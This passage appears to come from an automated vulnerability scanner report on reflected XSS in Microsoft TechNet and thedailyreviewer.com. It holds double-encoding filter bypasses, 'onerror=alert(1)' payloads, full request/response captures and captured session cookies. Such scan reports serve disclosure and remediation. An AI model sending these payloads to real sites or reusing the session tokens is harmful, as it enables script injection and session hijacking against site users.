There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us74ced%2522%253e%253ca%253ef8c0a390206/library/bb742583.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:50 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us74ced"><a>f8c0a390206/library/bb742583" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2951e%2522%253e%253ca%253ec2961b6e386 was submitted in the REST URL parameter 2. This input was echoed as 2951e"><a>c2961b6e386 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library2951e%2522%253e%253ca%253ec2961b6e386/bb742583.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:57 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library2951e"><a>c2961b6e386/bb742583" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a18b6%2522%253e%253ca%253ec61ea599091 was submitted in the REST URL parameter 3. This input was echoed as a18b6"><a>c61ea599091 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb742583.aspxa18b6%2522%253e%253ca%253ec61ea599091 HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10210
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:59:06 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb742583.aspxa18b6"><a>c61ea599091" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a623a%2522%253e%253ca%253ec95da8222ab was submitted in the REST URL parameter 1. This input was echoed as a623a"><a>c95da8222ab in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usa623a%2522%253e%253ca%253ec95da8222ab/library/default(loband).aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10213 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:56:58 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usa623a"><a>c95da8222ab/library/default(loband)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa021%2522%253e%253ca%253e619786c76b7 was submitted in the REST URL parameter 2. This input was echoed as aa021"><a>619786c76b7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryaa021%2522%253e%253ca%253e619786c76b7/default(loband).aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10213 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:05 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryaa021"><a>619786c76b7/default(loband)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1132%2522%253e%253ca%253eead51d01886 was submitted in the REST URL parameter 3. This input was echoed as f1132"><a>ead51d01886 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/default(loband).aspxf1132%2522%253e%253ca%253eead51d01886 HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10223 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:13 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/default(loband).aspxf1132"><a>ead51d01886" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bf8aa<img%20src%3da%20onerror%3dalert(1)>91a0ff23fcb was submitted in the REST URL parameter 3. This input was echoed as bf8aa<img src=a onerror=alert(1)>91a0ff23fcb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/abf8aa<img%20src%3da%20onerror%3dalert(1)>91a0ff23fcb HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:40 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=c758f11375b62597a0e1b94ffaad4436; expires=Wed, 12-Dec-2035 00:30:41 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with abf8aa<img src=a onerror=alert(1)>91a0ff23fcb</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c3df1<img%20src%3da%20onerror%3dalert(1)>f6ca78564af was submitted in the REST URL parameter 3. This input was echoed as c3df1<img src=a onerror=alert(1)>f6ca78564af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/bc3df1<img%20src%3da%20onerror%3dalert(1)>f6ca78564af HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:42 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=f30dab902adfef78bd9ed1d56b7bf8c2; expires=Wed, 12-Dec-2035 00:30:42 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with bc3df1<img src=a onerror=alert(1)>f6ca78564af</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5310f<img%20src%3da%20onerror%3dalert(1)>dee4f1b5745 was submitted in the REST URL parameter 3. This input was echoed as 5310f<img src=a onerror=alert(1)>dee4f1b5745 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/c5310f<img%20src%3da%20onerror%3dalert(1)>dee4f1b5745 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:47 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=317df6a4dcf6308dc5b0d2dfc5e944a7; expires=Wed, 12-Dec-2035 00:30:47 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
